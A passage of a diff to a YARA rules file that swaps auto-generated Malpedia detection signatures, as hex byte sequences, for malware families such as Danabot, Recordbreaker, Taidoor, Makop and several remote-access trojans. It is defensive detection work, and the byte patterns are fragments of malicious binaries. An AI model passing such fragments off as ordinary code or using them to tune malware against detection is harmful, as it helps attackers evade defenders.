8d4de0 51 50 e8???????? 85c0 } - $sequence_1 = { 6a07 6800000040 57 e8???????? 8bf8 83ffff } - $sequence_2 = { 6889000000 ff7508 33db 897df8 } - $sequence_3 = { 57 6800000002 6a03 57 6a01 56 } - $sequence_4 = { 56 6880000000 6a02 eb08 56 6880000000 6a04 } - $sequence_5 = { 85c0 7407 c745f801000000 397dfc 740e } - $sequence_6 = { be80000000 56 6a03 57 6a01 6889000000 ff7508 } - $sequence_7 = { 53 e8???????? 85c0 7407 c745f801000000 397dfc 740e } - $sequence_8 = { 8965fc ff7510 ff750c ff7508 ffd0 8b65fc } - $sequence_9 = { 7454 57 56 6a03 } + $sequence_0 = { ff15???????? 8bf0 3bf3 89754c } + $sequence_1 = { 8bd4 46 62807013e64e 13e6 d1b660d40c3e } + $sequence_2 = { 8d4d70 e8???????? ff30 687b020000 57 68???????? e8???????? } + $sequence_3 = { ff75f0 ffd6 8bc7 f7d8 } + $sequence_4 = { 50 bf00040000 57 ff15???????? 85c0 8d8574f7ffff 7405 } + $sequence_5 = { ff7508 53 ff15???????? 53 8d83080a0000 50 } + $sequence_6 = { 8d4d28 e8???????? 50 68???????? e8???????? } + $sequence_7 = { 8933 39753c 8b457c 8930 753d 39756c } + $sequence_8 = { e8???????? 8d8570fdffff 50 8d4dc4 } + $sequence_9 = { ff756c ff15???????? 8d4524 50 8d4d4c e8???????? eb25 } condition: - 7 of them and filesize <741376 + 7 of them and filesize <458752 } -rule MALPEDIA_Win_Kimjongrat_Auto : FILE +rule MALPEDIA_Win_Bluelight_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "db4baf64-c410-5dd4-86f2-fb3657762c91" + id = "80cf9226-cefd-5819-9dda-98c83a2352a6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kimjongrat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bluelight_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "515b099b5f4271a4a56e7e428e24670deb74340ff8bb9a2bab6a20ed3f485ca9" + logic_hash = "ac28d46c928f9de871e1c7301334eafe0ce66f50fc56cf0b475e83370bd02ded" score = 75 quality = 75 tags = "FILE" @@ -134896,32 +137726,32 @@ rule MALPEDIA_Win_Kimjongrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? c6840db4edffff2a e9???????? c6840db4edffff26 e9???????? c6840db4edffff5b eb6c } - $sequence_1 = { e8???????? 8bd8 83c414 85db 0f8508010000 33c9 894de4 } - $sequence_2 = { ff7004 8d4108 50 e8???????? 8b5508 8b4840 894a20 } - $sequence_3 = { ff7508 e8???????? 6a01 57 6a4c 56 e8???????? } - $sequence_4 = { e9???????? 8b4c8f58 894dd0 898d60ffffff 8b55a4 b860240000 66854208 } - $sequence_5 = { c68540d0ffff00 e8???????? 83c40c ba???????? 33c9 8a02 42 } - $sequence_6 = { e9???????? c6840da0e8ffff77 e9???????? c6840da0e8ffff76 e9???????? c6840da0e8ffff65 e9???????? } - $sequence_7 = { ff30 e8???????? 8b450c 83c404 c70000000000 8b55f8 c645f000 } - $sequence_8 = { e9???????? c6840dccf3ffff2d e9???????? c6840dccf3ffff7d e9???????? c6840dccf3ffff29 e9???????? } - $sequence_9 = { 8bf8 83c404 897dac 85ff 0f8418f3ffff b800400000 66854608 } + $sequence_0 = { c7466400000000 6a01 8d4510 c645fc03 50 8d45e0 68???????? } + $sequence_1 = { e8???????? 85c0 0f85e1040000 8b55c0 8b4638 8d4aff 0fc9 } + $sequence_2 = { b97bfe0000 e8???????? 8945f8 8b4dfc e8???????? 83670c00 8b45f8 } + $sequence_3 = { 8bce e8???????? 8bd8 895dc4 85db 0f84bf0e0000 8b5348 } + $sequence_4 = { 884508 8b4204 8945d8 8b02 8b75d8 3b30 8b75f0 } + $sequence_5 = { f3a5 eb23 ff742420 68???????? eb92 8d4101 8bcb } + $sequence_6 = { ff248504d44600 6a00 c743140f000000 8bcb c7431000000000 68???????? c60300 } + $sequence_7 = { 7414 8bce e8???????? 814b0400000100 894308 8b45fc 8bd0 } + $sequence_8 = { e8???????? 8bd0 52 e8???????? 83c404 8b4518 8b4df4 } + $sequence_9 = { f7410400000400 7408 8b4114 8b4804 eb03 8b490c 85c9 } condition: - 7 of them and filesize <1572864 + 7 of them and filesize <2191360 } -rule MALPEDIA_Win_Herpes_Auto : FILE +rule MALPEDIA_Win_Taidoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "81a5deba-39e3-5a1f-937c-6696c1e1bbb2" + id = "ede5ce97-d13f-50cf-a7ae-7678b51deb4c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.herpes_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.taidoor_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "e0891dbd163cc34c7d236958d6844c054a085f2a34f7c0d3c53aa2f138d5b650" + logic_hash = "9a08978fbb3ba0f91c4ac24abe796c18c68bd8ea90cbb67ac44eb5676631b436" score = 75 quality = 75 tags = "FILE" @@ -134935,32 +137765,32 @@ rule MALPEDIA_Win_Herpes_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7303 8d4570 ffb580000000 50 8b45f0 03c7 } - $sequence_1 = { 8d9424380d0000 52 ffd6 eb30 6a38 8d4c241c 51 } - $sequence_2 = { 68???????? eb05 68???????? 56 ffd7 bb05000000 399d64ffffff } - $sequence_3 = { 68???????? 89869c010000 ffb604020000 ffd7 68???????? } - $sequence_4 = { 64a300000000 b80f000000 33ff 8985e4feffff 89bde0feffff } - $sequence_5 = { 57 ff15???????? 5f 8b4dfc 33cd e8???????? } - $sequence_6 = { ff15???????? 85c0 742a 8b959cfdffff 52 e8???????? } - $sequence_7 = { 39bdd4fcffff 7302 8bc3 83ec1c 8bf4 } - $sequence_8 = { 52 ffd6 68???????? 8d858ffeffff 50 } - $sequence_9 = { 52 6a00 89bde0fcffff ff15???????? 85c0 745e 8d85e4fcffff } + $sequence_0 = { 7cf5 c745fcfcffffff 33ff 33db } + $sequence_1 = { f775fc 8bf2 8d04f6 ffb485f4b7ffff ff15???????? 85c0 } + $sequence_2 = { 59 8d85a0fdffff 59 50 e8???????? } + $sequence_3 = { 57 a0???????? c745fc01000000 8ac8 f6d9 1bc9 33db } + $sequence_4 = { 66ab aa 895dfc ffd6 40 85c0 7e29 } + $sequence_5 = { b940420f00 f7f9 8d45e0 52 ff35???????? ff35???????? } + $sequence_6 = { ff75f0 ffd6 8d4d08 885dfc e8???????? 834dfcff 8d4d10 } + $sequence_7 = { ff75ec 8d4df0 e8???????? 8b450c 46 3b70f8 7cdc } + $sequence_8 = { e8???????? ff75ec 8d85a0fdffff 50 51 8bcc 8965f4 } + $sequence_9 = { bf80020000 57 c745fc01000000 ffd3 8bf0 } condition: - 7 of them and filesize <319488 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Recordbreaker_Auto : FILE +rule MALPEDIA_Win_Mongall_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "242c0c11-6eb0-5e72-beaa-aa71c863ae8a" + id = "df02f29b-7e4c-5b43-ac4d-a0a6d3cf6ee1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.recordbreaker_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mongall" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mongall_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "600e9d6aeb0913499891accea4667949930b0cff9e2a09c3687c79439815914b" + logic_hash = "09c3cb724c571a18322afe8d7b1ace648402df7ba3a7200f8ca50d9538f078c7" score = 75 quality = 75 tags = "FILE" @@ -134974,32 +137804,32 @@ rule MALPEDIA_Win_Recordbreaker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 2bf7 8bcf d1fe 56 53 e8???????? } - $sequence_1 = { 42 66890c38 8d0412 0fb70c30 663bcb } - $sequence_2 = { 59 85c0 7408 6afe } - $sequence_3 = { 6a02 ff75fc ff15???????? 6a03 ff75fc ff15???????? 6a04 } - $sequence_4 = { 8bd7 8bc8 e8???????? 8b15???????? 8bc8 e8???????? 8bd3 } - $sequence_5 = { 6a1a 53 6a00 8bf8 } - $sequence_6 = { 881e 46 49 83ea01 } - $sequence_7 = { 8b15???????? 8bc8 e8???????? 8b55ec } - $sequence_8 = { 2bc6 d1f8 56 8d3c46 33c0 } - $sequence_9 = { 8b4d0c 8b07 5f 5e } + $sequence_0 = { ff15???????? 8b400c 8b08 8b11 52 ff15???????? ba???????? } + $sequence_1 = { 85ff 747c 56 57 68???????? e8???????? 68???????? } + $sequence_2 = { f3a5 8bc8 8b8500d9ffff 83e103 43 } + $sequence_3 = { 59 8985a0fdffff 3bc1 0f87cb090000 ff2485e6574000 838de8fdffffff 89b594fdffff } + $sequence_4 = { 8bd8 83fbff 7448 68???????? e8???????? } + $sequence_5 = { e8???????? 8bfc 85ff 741d 8b8df4fdffff 56 } + $sequence_6 = { 56 8d45f0 33f6 50 8935???????? 8935???????? ff15???????? } + $sequence_7 = { 8b7df0 8bc7 5f 5e c60300 } + $sequence_8 = { 89b5e4fdffff 89b5e0fdffff 89b5c0fdffff 888deffdffff } + $sequence_9 = { 85f6 5e 741d 8d85f8feffff } condition: - 7 of them and filesize <232312 + 7 of them and filesize <199680 } -rule MALPEDIA_Win_Danabot_Auto : FILE +rule MALPEDIA_Win_Makop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6c78b1f9-714b-5978-8883-c700c384c0f3" + id = "0ddd5ad6-ed99-5e37-bafe-b552882375b1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.danabot_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.makop_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "4cb498ddb7090d3a6017b222a7d9cd57acddd4317f82294d9c05727c52600ae4" + logic_hash = "153590702efa562c07e5adda47cdb1581820d31e1d121adbb82083fd02f6f827" score = 75 quality = 75 tags = "FILE" @@ -135013,32 +137843,32 @@ rule MALPEDIA_Win_Danabot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7405 83e804 8b00 83f814 7e18 8b45fc 50 } - $sequence_1 = { c1e803 83e03f 83f838 730b ba38000000 } - $sequence_2 = { 8b03 50 8b44242c 50 6a14 } - $sequence_3 = { 8b45f8 85c0 7407 83e804 } - $sequence_4 = { 8b16 e8???????? 8b07 50 8b442428 50 6a0a } - $sequence_5 = { 50 6a14 688a4c2a8d 8bc6 8b4d00 8b17 } - $sequence_6 = { 3b85d0feffff 7452 8b85d0feffff 50 6a00 } - $sequence_7 = { 6a00 49 75f9 51 53 56 bb???????? } - $sequence_8 = { 8b0f 8b16 e8???????? 8b07 50 8b442454 50 } - $sequence_9 = { 56 57 8bf1 8955f8 8945fc 8d45fc } + $sequence_0 = { 55 8bec 83e4f8 81ec10040000 53 55 56 } + $sequence_1 = { 8b84244c010000 8bcb 51 8b8c244c010000 52 50 51 } + $sequence_2 = { 117c241c 8bb840080000 017c2420 8bb844080000 117c2424 8b8050080000 3bc3 } + $sequence_3 = { 3d11010000 0f8567030000 0fb7442444 0517fcffff 83f806 0f8754030000 ff24859c4f4000 } + $sequence_4 = { 53 ff15???????? 85c0 0f84f1000000 6a00 8d442418 } + $sequence_5 = { 8d442418 50 51 e8???????? 85c0 0f85cb000000 } + $sequence_6 = { bb01000000 395d08 7571 b8???????? 668b08 83c002 6685c9 } + $sequence_7 = { 5e 5b 83c41c c3 ff15???????? 50 } + $sequence_8 = { 33db 3bf3 740f 56 895e18 895e1c } + $sequence_9 = { 895c241c 895c2420 895c2424 745e 90 8b06 } condition: - 7 of them and filesize <237568 + 7 of them and filesize <107520 } -rule MALPEDIA_Win_Listrix_Auto : FILE +rule MALPEDIA_Win_Babyshark_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f00b612a-8ee6-5314-b10b-7290e9e1e604" + id = "bba62dea-b8fb-5177-af59-ee7484609223" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.listrix_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.babyshark_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "2287c5f695d49f8318bd5f0c78a77cdf4d2c441f03bbfda75594fd76fd20827f" + logic_hash = "170a55c792dd841a430b5276e4b7ea8cd0c0e2d28c406b503a22728951bd6c1d" score = 75 quality = 75 tags = "FILE" @@ -135052,32 +137882,32 @@ rule MALPEDIA_Win_Listrix_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8dc0f5ffff 51 ffd3 85c0 7454 57 } - $sequence_1 = { 85f6 740d f68594f5ffff10 0f84ac010000 8b1d???????? 68???????? 8d85c0f5ffff } - $sequence_2 = { 8d46ff 50 8b8584f5ffff 51 52 50 8d8df4fbffff } - $sequence_3 = { 8d85f4f7ffff 50 ff15???????? 8b7518 } - $sequence_4 = { 89b588f5ffff 397510 0f8e4c020000 57 8d85f4f7ffff 50 } - $sequence_5 = { 50 8d4c2470 51 c744242430794000 } - $sequence_6 = { c1e802 89442408 c744240c02000000 85c0 0f8408010000 } - $sequence_7 = { 8bc7 c1f805 c1e606 033485e0ad4000 8b45f8 8b00 } - $sequence_8 = { a1???????? c705????????cc274000 8935???????? a3???????? ff15???????? a3???????? } - $sequence_9 = { 6a00 8d95e4f9ffff 52 ff15???????? 85c0 0f84bb000000 } + $sequence_0 = { 83c40c 8d4c2404 6a00 51 ffd6 6a00 } + $sequence_1 = { 8bc8 83e01f c1f905 8b0c8d607e4000 8a44c104 83e040 } + $sequence_2 = { 8b0c8d607e4000 8a44c104 83e040 c3 a1???????? } + $sequence_3 = { bf???????? f3ab 8d3452 895dfc c1e604 aa 8d9ec8674000 } + $sequence_4 = { 80e920 ebe0 80a0206c400000 40 3bc6 72be 5e } + $sequence_5 = { 8db6bc674000 bf???????? a5 a5 59 a3???????? } + $sequence_6 = { 8a8094504000 83e00f eb02 33c0 0fbe84c6b4504000 } + $sequence_7 = { c1f804 83f807 8945d0 0f879a060000 ff2485271a4000 834df0ff } + $sequence_8 = { 5e 8d0c8dc8614000 3bc1 7304 3910 7402 } + $sequence_9 = { ff15???????? 8bf0 68???????? 8d442408 68???????? 50 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <65272 } -rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE +rule MALPEDIA_Win_Grillmark_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3e8b1848-3ea9-5312-86aa-83712c0906a6" + id = "891e7259-5469-58d4-a39e-a516f4f2c7d3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.matryoshka_rat_auto.yar#L1-L141" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grillmark_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "e63bf906be3841d18c1769641826f4871bcf6c179928d9c22e19c757766e13e1" + logic_hash = "fc8f047bb79d7c6ba82d87162ce46a1dc6555c1672864dfce07f64d88dd917ae" score = 75 quality = 75 tags = "FILE" @@ -135091,36 +137921,32 @@ rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b037 c3 b073 c3 } - $sequence_1 = { c3 b06f c3 b063 c3 } - $sequence_2 = { 8b46fc 8947fc 49 75ed 5f ff4210 } - $sequence_3 = { 8b4704 ff4710 ff07 8b0488 } - $sequence_4 = { 74e3 440fb603 430fbe841040d30500 85c0 } - $sequence_5 = { 8b4708 3b470c 7507 8bcf } - $sequence_6 = { 74e2 ff8170040000 83b97004000002 0f8493010000 83cfff 488d2d572c0300 } - $sequence_7 = { 74e9 488d15b9450400 488bcb e8???????? } - $sequence_8 = { 74de 83cbff 488bca e8???????? 90 48897c2420 } - $sequence_9 = { 8b4708 b120 8b570c 8b7718 } - $sequence_10 = { 74e6 488d152fac0300 488bcb e8???????? } - $sequence_11 = { 8b4704 8b3491 890491 8bd6 } - $sequence_12 = { 74e2 ff8170040000 83b97004000002 0f84eb010000 83cfff 4c8d3dde290300 } - $sequence_13 = { 8b4704 8bf1 33d1 81e6ff030000 } + $sequence_0 = { 83bd44ffffff04 7705 bb???????? 83bd44ffffff05 8b8548ffffff 7528 85c0 } + $sequence_1 = { 5e 5d c21400 55 8bec 56 68???????? } + $sequence_2 = { 59 7e13 50 57 6800000002 ff15???????? 8bd8 } + $sequence_3 = { 7409 ff75fc ff15???????? 56 56 56 } + $sequence_4 = { 66895dc4 50 c745c001010000 e8???????? ff7508 8d8590feffff 50 } + $sequence_5 = { 6a09 ab 59 8d7dc0 8975bc 8975f8 } + $sequence_6 = { 8dbdfdfeffff 889dfcfeffff 53 f3ab 66ab aa 8d85fcfeffff } + $sequence_7 = { 8d85f8fdffff 50 750d ffd7 8d85f4fcffff 50 } + $sequence_8 = { ff75f8 56 ff7508 ff75fc e8???????? 83c418 } + $sequence_9 = { ffd6 85c0 7473 8d45c8 } condition: - 7 of them and filesize <843776 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Nullmixer_Auto : FILE +rule MALPEDIA_Win_Liteduke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e761e8a0-6032-5175-8c62-373d3cfdbd32" + id = "c89a689f-3dfd-5d2a-aec1-28f7aca47554" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nullmixer_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.liteduke_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "ff19905731e10511745fb317854603fdd089737424883a407ad871400c764a1f" + logic_hash = "5d6b62682cd8e4bed5eedc1b6f48e136bed91567c9f36c00bf40e1cbea238867" score = 75 quality = 75 tags = "FILE" @@ -135134,32 +137960,32 @@ rule MALPEDIA_Win_Nullmixer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6683fa05 0f8726010000 83e857 83f8ff 0f85d0fcffff 8d7600 } - $sequence_1 = { c7442404???????? c70424???????? c705????????d09d4a00 e8???????? c705????????01000000 83ec08 89d9 } - $sequence_2 = { a3???????? 8d8568feffff c7442408???????? c7442404???????? 890424 e8???????? 8d8568feffff } - $sequence_3 = { 8901 8d44241f 89442408 e8???????? 31d2 c7400800000000 83c00c } - $sequence_4 = { c784245001000000000000 31c9 e9???????? 8b8c2450010000 e8???????? b8ffffffff 8b94245c010000 } - $sequence_5 = { 01c9 896c2404 894c2408 890424 e8???????? e9???????? 8b442448 } - $sequence_6 = { 398424d0000000 0f8430050000 8b06 c744240400000000 89f1 0fb75502 891424 } - $sequence_7 = { 83f90f 0f4fc8 8b45a8 3975ac 19f8 0f82d0000000 8b55bc } - $sequence_8 = { 83ec04 837d8010 8d75b4 0f94c2 8b4808 39f9 894d8c } - $sequence_9 = { 89f1 e8???????? 8b06 89f1 c704242b000000 ff5018 52 } + $sequence_0 = { ff7508 ff15???????? ff75fc ff15???????? 5b 5e } + $sequence_1 = { 6800010000 ff15???????? c3 68???????? ff15???????? } + $sequence_2 = { 5b 5e 5f 8b45d8 c9 c20400 55 } + $sequence_3 = { 41 83f904 7cdd 5f 5e } + $sequence_4 = { c9 c20800 55 89e5 ff7508 e8???????? } + $sequence_5 = { c20c00 c70101000000 61 c9 c20c00 c70100000000 61 } + $sequence_6 = { c1c006 243f 3c3e 7205 c0e002 2c0e 2c04 } + $sequence_7 = { 46 8a06 8807 46 43 41 42 } + $sequence_8 = { b800000000 8a03 c1e804 83f809 7f05 83c030 eb03 } + $sequence_9 = { 56 e8???????? 83c40c ff750c 56 e8???????? 83c408 } condition: - 7 of them and filesize <2351104 + 7 of them and filesize <1171456 } -rule MALPEDIA_Win_Coredn_Auto : FILE +rule MALPEDIA_Win_Balkan_Door_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "06de0230-4bd5-5e45-a730-cba0310a794f" + id = "9f746f91-5631-5121-b4e8-99ba1997828d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.coredn_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.balkan_door_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "706fde100ad28c7717e1440d078632bf0db4418173418e843d6c6c3781f1d1c0" + logic_hash = "3ecc62d6dd03e7104a1dd179870266fc7dbfc3c0ad204dec134adb374e60ab02" score = 75 quality = 75 tags = "FILE" @@ -135173,37 +137999,32 @@ rule MALPEDIA_Win_Coredn_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 56 8d45fc 8bf1 50 e8???????? 85c0 } - $sequence_1 = { 7506 48 bf7a000780 c60000 8bc7 5f 5b } - $sequence_2 = { 8a1c06 84db 741c 8818 4a 40 } - $sequence_3 = { 83ea01 75e7 8851ff b87a000780 } - $sequence_4 = { 8be5 5d c20400 85c9 7506 48 bf7a000780 } - $sequence_5 = { 8bec 56 8b7508 ba04010000 2bf1 } - $sequence_6 = { 8a040e 84c0 7415 8801 41 83ea01 } - $sequence_7 = { 85d2 750d 8851ff b87a000780 5e } - $sequence_8 = { 8b550c 83ec20 33c9 8bc1 3914c5a81b4100 7408 } - $sequence_9 = { 8b45fc 81784890334100 7409 ff7048 e8???????? 59 c70701000000 } - $sequence_10 = { eb04 85c9 7508 83e802 bb7a000780 33c9 } - $sequence_11 = { c644241301 f6c301 744c 8b442414 } - $sequence_12 = { e9???????? c745e0a4124100 eba2 894ddc c745e0a4124100 e9???????? c745dc03000000 } - $sequence_13 = { 660fd60f 8d7f08 8b048d942e4000 ffe0 f7c703000000 7413 } - $sequence_14 = { 23c1 eb55 8b1c9d30d24000 56 6800080000 6a00 53 } + $sequence_0 = { 50 ff15???????? 8bf8 89bd3cefffff } + $sequence_1 = { 8bf0 85f6 740b 6a00 6a00 56 ff15???????? } + $sequence_2 = { ffd7 85c0 741a 8d85d0fdffff c785d0fdffff2c020000 50 56 } + $sequence_3 = { 8d85f4fdffff 50 ffd7 85c0 741a 8d85d0fdffff c785d0fdffff2c020000 } + $sequence_4 = { c785d0fdffff2c020000 50 56 ffd3 } + $sequence_5 = { 56 ff15???????? 8b4dfc 8b85ccfdffff 33cd 5e e8???????? } + $sequence_6 = { e8???????? 83c404 8bbd3cefffff 6a00 } + $sequence_7 = { 8b85d8fdffff 8985ccfdffff 5f 5b 56 } + $sequence_8 = { 683f000f00 68???????? 57 ff15???????? } + $sequence_9 = { 50 57 6a00 6a13 ffb53cefffff ff15???????? 85c0 } condition: - 7 of them and filesize <270336 + 7 of them and filesize <352256 } -rule MALPEDIA_Win_Dorshel_Auto : FILE +rule MALPEDIA_Win_Glooxmail_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "550d8628-f52a-56de-91a7-ece0c38b96fb" + id = "9fc08289-2c15-5e6a-a020-5e3374a227b0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dorshel_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glooxmail_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "364203df24c6a83e17731caab6caa244bb9a531055fdc65fef6d763de8c4fb40" + logic_hash = "3f9c49f2bcdac7dc8871b003117cb741dd79fa085062dcf8b6237e67caf4dc2a" score = 75 quality = 75 tags = "FILE" @@ -135217,32 +138038,32 @@ rule MALPEDIA_Win_Dorshel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec 83ec0c 31c0 648b5030 8b520c 8b5214 } - $sequence_1 = { 8d7708 8b3f 33fb f3a4 5f } - $sequence_2 = { 03f8 84c0 75f6 81ff5e515e83 7408 81ff36cadb30 75da } - $sequence_3 = { 83c004 e2f9 58 54 50 } - $sequence_4 = { 51 8b0f 33cb 51 ff55f8 8b5df4 } - $sequence_5 = { 54 50 8b4f04 33cb 51 8b0f } - $sequence_6 = { ffd5 85c0 74cd 8b07 01c3 } - $sequence_7 = { ac c1cf0d 03f8 84c0 75f6 81ff5e515e83 7408 } - $sequence_8 = { 57 6800200000 53 56 68129689e2 ffd5 85c0 } - $sequence_9 = { 5f 8b4704 33c3 83c104 99 } + $sequence_0 = { 834dfcff 6a00 53 8d4d38 } + $sequence_1 = { e8???????? 899c2460800000 895c240c 895c2410 68ff7f0000 8d442451 53 } + $sequence_2 = { 57 8d8c24f4030000 e8???????? 8d8c2418080000 51 8d8c24f4030000 c684246408000030 } + $sequence_3 = { 0f840c000000 8365f0fe 8d4dc4 e9???????? c3 8b542408 8d420c } + $sequence_4 = { b8???????? e9???????? 8d4d00 e9???????? 8d4dd4 e9???????? 8d4dd4 } + $sequence_5 = { 59 c3 8b85acf7ffff 2500000400 0f8415000000 81a5acf7fffffffffbff } + $sequence_6 = { e8???????? 8bd9 895de8 8d7b04 8d7308 c703???????? c707???????? } + $sequence_7 = { c700???????? c74004???????? c74008???????? c7400cb04a4400 c74010bc4a4400 c74014c84a4400 c74018d44a4400 } + $sequence_8 = { 8d8d2cffffff e9???????? c3 8b542408 8d82acfbffff 8b8aa8fbffff 33c8 } + $sequence_9 = { ff750c 8b01 ff5044 84c0 7504 b301 eb02 } condition: - 7 of them and filesize <24576 + 7 of them and filesize <761856 } -rule MALPEDIA_Win_Grimplant_Auto : FILE +rule MALPEDIA_Win_Chiser_Client_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c3eab5e9-e64a-5697-878f-14199bbf7239" + id = "e8afcaec-169c-5519-a609-4458271450b4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grimplant_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chiser_client" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chiser_client_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "eec64e00f45245d4dee8d091e0d2ebea0088235a6d441087ed38c039f05955af" + logic_hash = "3bc0569053961dd359f1e4296146fed96a2d550b29a6ec46396d68a2c22beadc" score = 75 quality = 75 tags = "FILE" @@ -135256,32 +138077,32 @@ rule MALPEDIA_Win_Grimplant_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 3c08 7465 eb15 3c0e 0f8ff5000000 90 } - $sequence_1 = { ffd2 eb3d 488b4c2428 